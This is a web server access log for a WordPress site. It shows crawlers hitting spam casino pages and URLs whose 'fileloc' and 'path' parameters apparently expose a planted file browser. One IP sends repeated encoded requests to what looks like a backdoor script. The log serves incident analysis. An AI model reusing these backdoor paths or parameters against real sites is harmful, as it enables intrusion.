51.195.215.56 - - [01/May/2026:11:46:45 +0300] "GET /detail/126610199?path=/var/www HTTP/2" 200 4996 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:11:46:54 +0300] "GET /?detail/92276069 HTTP/1.1" 200 29263 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.38.147.241 - - [01/May/2026:11:47:06 +0300] "GET /detail/121223830?fileloc=/var/www/vhosts/miroglu.net/httpdocs/license.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 10175 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:11:45:07 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383730372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353130372q6364663964326462383133323438643863363136353631353132333738386439222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
185.216.113.70 - - [01/May/2026:11:45:29 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383732392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353132392q6465653638626166363865633561343731623534396166656139663635666562222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
198.244.242.199 - - [01/May/2026:11:47:30 +0300] "GET /detail/107707793?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-cron.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 4919 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:11:47:35 +0300] "GET /shop/glary/oleiferous17924498465.html HTTP/1.1" 200 28953 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:47:40 +0300] "GET /'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 30681 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:47:43 +0300] "GET /KWf_CSfUserGuideMark_cls.jsp?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpPYbAJK&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.163 - - [01/May/2026:11:47:48 +0300] "GET /?prizes/175648757 HTTP/1.1" 200 30536 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:47:50 +0300] "GET /14474-2/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpW2eq0R&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 100292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:45:51 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383735312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353135312q3837666664346135633737363937393961646131616333323238633336626632222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
198.244.168.237 - - [01/May/2026:11:47:54 +0300] "GET /casinos-dinero-real-chile/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/admin.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 56953 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:47:54 +0300] "GET /14474-2/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphp45RLGx&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:48:09 +0300] "GET /detail/985235375?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net%2Fger%C3%A7ek-slot-oyunlar%C4%B1.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 5242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:48:10 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Flatest-posts%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Flatest-posts HTTP/2" 200 3685 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:46:13 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383737332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353137332q6535633863386232643232396565653938363134396430623932313835376465222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:48:18 +0300] "GET /detail/985235375?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpxT5S25&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:48:26 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fincludes%2Fclass-bulk-theme-upgrader-skin.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fincludes HTTP/2" 200 3788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:48:33 +0300] "GET /?detail/589880701 HTTP/1.1" 200 28918 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:46:35 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383739352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353139352q3034643335656166346430343633643936363236633562323966656232313263222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
185.191.171.8 - - [01/May/2026:11:48:44 +0300] "GET /kraken-aktual-nye-ssylki-i-bezopasnye-metody-dostupa/ HTTP/1.1" 200 10391 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.163 - - [01/May/2026:11:48:52 +0300] "GET /?detail/227157864 HTTP/1.1" 200 30560 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:46:57 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383831372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353231372q6365383261353633363862333931623139323261653534653032373161353933222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [01/May/2026:11:49:10 +0300] "GET /?detail/321114446 HTTP/1.1" 200 29217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
101.99.88.90 - - [01/May/2026:11:49:16 +0300] "GET / HTTP/1.1" 200 207630 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:47:19 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383833392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353233392q3136326565383239326338383534373464383561383234653430393235613839222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:49:23 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fkgsmi%2Freadme.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fkgsmi HTTP/2" 200 3911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:49:26 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphpb56J6y&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:49:39 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpCr02Ng&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:47:42 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383836322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353236322q3962306666623962333063373534626231626362363439366566396136393736222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:49:44 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22 HTTP/2" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:49:48 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2F.entry&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 3724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.2 - - [01/May/2026:11:49:50 +0300] "GET /shop/absinthium/musit321544321982.html HTTP/1.1" 200 19094 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [01/May/2026:11:49:54 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2F.element&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.11 - - [01/May/2026:11:49:55 +0300] "GET /discover-the-power-of-sushiswap-for-efficient-trading/2 HTTP/1.1" 200 10391 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.78.1 - - [01/May/2026:11:49:55 +0300] "GET /?detail/602814988 HTTP/1.1" 200 28725 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:49:58 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpSfVkFx&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5021 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
2.56.109.150 - - [01/May/2026:11:50:00 +0300] "GET /online-casino-mit-1-euro-bonus/ HTTP/1.1" 500 411 "https://miroglu.net/" "Mozilla/5.0 (Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
2.56.109.150 - - [01/May/2026:11:50:00 +0300] "GET /online-casino-mit-1-euro-bonus/ HTTP/1.1" 200 8693 "https://miroglu.net/" "Mozilla/5.0 (Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
2.56.109.150 - - [01/May/2026:11:50:02 +0300] "GET /online-casino-mit-1-euro-bonus/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/55ece37ba5f55f1032982f56b7fbfb48&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5517 "https://miroglu.net/online-casino-mit-1-euro-bonus/" "Mozilla/5.0 (Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
185.216.113.70 - - [01/May/2026:11:48:04 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383838342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353238342q6131633831323761666462353462316538643332323962393766643133323736222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.2 - - [01/May/2026:11:50:12 +0300] "GET /shop/belimed/warrantee36563110720.html HTTP/1.1" 200 17774 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [01/May/2026:11:50:20 +0300] "GET /?detail/105865592 HTTP/1.1" 200 18368 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:48:29 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383930392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353330392q3135383538653663356162363366633235396334616163646232353232393435222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:11:50:29 +0300] "GET /?detail/824969998 HTTP/1.1" 200 17908 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:50:30 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 24982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:50:34 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net%2Fkumar-makinesi-casino.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 4770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.18 - - [01/May/2026:11:50:43 +0300] "GET /united-kingdom-bingo-sites-that-accept-paypal/ HTTP/1.1" 500 374 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:48:50 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383933302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353333302q3632336263633137303661326539653638343835666162313834643534303266222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
101.99.88.90 - - [01/May/2026:11:49:20 +0300] "GET /wp-includes/brb35b65/index.php HTTP/1.1" 200 214 "-" "-"
185.216.113.70 - - [01/May/2026:11:49:12 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383935322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353335322q3666386539376337323861613739333963366135343030646534343766636537222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:51:16 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Flogs%2Fserhatburke.miroglu.net%2Faccess_log&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Flogs%2Fserhatburke.miroglu.net HTTP/2" 200 5190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:51:20 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-ru_RU.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 13753 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:51:26 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2F.well-known HTTP/2" 200 5491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:51:30 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-tr_TR.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 10068 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:49:34 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383937342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353337342q6531363036376536653937363835336334666537656239323735303431303636222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:51:39 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Flanguages HTTP/2" 200 3209 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [01/May/2026:11:51:37 +0300] "GET /?detail/781790650 HTTP/1.1" 200 30021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:49:56 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383939362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353339362q6234663037303965633066333930313437306263346139303330353238356131222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
185.191.171.13 - - [01/May/2026:11:52:02 +0300] "GET /discover-the-unique-features-of-raydium-exchange/ HTTP/1.1" 200 10394 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [01/May/2026:11:52:03 +0300] "GET /?detail/385037835 HTTP/1.1" 200 30214 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.2 - - [01/May/2026:11:52:16 +0300] "GET /?detail/469455946 HTTP/1.1" 200 30343 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:50:18 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632393031382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632353431382q6431363739626238613139306365643430336265636462383836663534666239222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:52:25 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-zh_TW.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 10127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.202 - - [01/May/2026:11:52:29 +0300] "GET /kraken-aktual-nyi-dostup-k-darknetu-2026/2 HTTP/1.1" 200 10364 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.78.1 - - [01/May/2026:11:52:28 +0300] "GET /?detail/346695565 HTTP/1.1" 200 29074 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
